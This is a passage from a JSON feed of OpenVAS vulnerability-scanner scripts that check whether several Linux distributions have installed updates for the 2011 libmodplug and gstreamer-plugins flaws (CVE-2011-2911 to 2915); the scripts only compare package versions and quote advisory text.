After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-14.", "modified": "2017-07-07T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:71300", "href": "http://plugins.openvas.org/nasl.php?oid=71300", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Audacious Plugins could result in\n execution of arbitrary code or Denial of Service.\";\ntag_solution = \"All Audacious Plugins users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-plugins/audacious-plugins-3.1'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=383991\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201203-14.\";\n\n \n \nif(description)\n{\n script_id(71300);\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security 
Advisory GLSA 201203-14 (audacious-plugins)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-plugins/audacious-plugins\", unaffected: make_list(\"ge 3.1\"), vulnerable: make_list(\"lt 3.1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Check for the Version of libmodplug", "modified": "2018-01-05T00:00:00", "published": "2012-03-19T00:00:00", "id": "OPENVAS:863809", "href": "http://plugins.openvas.org/nasl.php?oid=863809", "type": "openvas", "title": "Fedora Update for libmodplug FEDORA-2011-10452", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libmodplug FEDORA-2011-10452\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU 
General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"libmodplug on Fedora 16\";\ntag_insight = \"Modplug mod music file format library.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-August/064279.html\");\n script_id(863809);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:19:03 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name: \"FEDORA\", value: \"2011-10452\");\n script_name(\"Fedora Update for libmodplug FEDORA-2011-10452\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libmodplug\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name 
: \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmodplug\", rpm:\"libmodplug~0.8.8.4~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:55:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Check for the Version of gstreamer-plugins", "modified": "2017-07-12T00:00:00", "published": "2011-09-12T00:00:00", "id": "OPENVAS:870483", "href": "http://plugins.openvas.org/nasl.php?oid=870483", "type": "openvas", "title": "RedHat Update for gstreamer-plugins RHSA-2011:1264-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for gstreamer-plugins RHSA-2011:1264-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n \n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. 
After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\";\n\ntag_affected = \"gstreamer-plugins on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-September/msg00004.html\");\n script_id(870483);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-12 16:29:49 +0200 (Mon, 12 Sep 2011)\");\n script_xref(name: \"RHSA\", value: \"2011:1264-01\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"RedHat Update for gstreamer-plugins RHSA-2011:1264-01\");\n\n script_summary(\"Check for the Version of gstreamer-plugins\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", 
rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-debuginfo\", rpm:\"gstreamer-plugins-debuginfo~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:27:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1255-1", "modified": "2017-12-01T00:00:00", "published": "2011-11-11T00:00:00", "id": "OPENVAS:840800", "href": "http://plugins.openvas.org/nasl.php?oid=840800", "type": "openvas", "title": "Ubuntu Update for libmodplug USN-1255-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1255_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for libmodplug USN-1255-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Hossein Lotfi discovered that libmodplug did not correctly handle certain\n malformed media files. If a user or automated system were tricked into\n opening a crafted media file, an attacker could cause a denial of service\n or possibly execute arbitrary code with privileges of the user invoking the\n program. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\n\n It was discovered that libmodplug did not correctly handle certain\n malformed media files. If a user or automated system were tricked into\n opening a crafted media file, an attacker could cause a denial of service\n or possibly execute arbitrary code with privileges of the user invoking the\n program. 
(CVE-2011-2914, CVE-2011-2915)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1255-1\";\ntag_affected = \"libmodplug on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1255-1/\");\n script_id(840800);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:55:33 +0530 (Fri, 11 Nov 2011)\");\n script_xref(name: \"USN\", value: \"1255-1\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"Ubuntu Update for libmodplug USN-1255-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug1\", ver:\"1:0.8.8.1-1ubuntu1.3\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 
exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug0c2\", ver:\"1:0.8.7-1ubuntu0.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmodplug1\", ver:\"1:0.8.8.1-2ubuntu0.3\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing an update for the 'gstreamer-plugins' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2011-09-12T00:00:00", "id": "OPENVAS:1361412562310870483", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870483", "type": "openvas", "title": "RedHat Update for gstreamer-plugins RHSA-2011:1264-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for gstreamer-plugins RHSA-2011:1264-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-September/msg00004.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870483\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-12 16:29:49 +0200 (Mon, 12 Sep 2011)\");\n script_xref(name:\"RHSA\", value:\"2011:1264-01\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"RedHat Update for gstreamer-plugins RHSA-2011:1264-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gstreamer-plugins'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_4\");\n script_tag(name:\"affected\", value:\"gstreamer-plugins on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n 
streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-debuginfo\", rpm:\"gstreamer-plugins-debuginfo~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing an update for the 'gstreamer-plugins' package(s) announced via the referenced advisory.", "modified": 
"2019-03-15T00:00:00", "published": "2011-09-12T00:00:00", "id": "OPENVAS:1361412562310880974", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880974", "type": "openvas", "title": "CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-September/017719.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880974\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-12 16:29:49 +0200 (Mon, 12 Sep 2011)\");\n script_xref(name:\"CESA\", value:\"2011:1264\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\",\n \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gstreamer-plugins'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"gstreamer-plugins on CentOS 4\");\n script_tag(name:\"insight\", value:\"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. 
After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-14.", "modified": "2018-10-12T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:136141256231071300", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071300", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201203_14.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71300\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
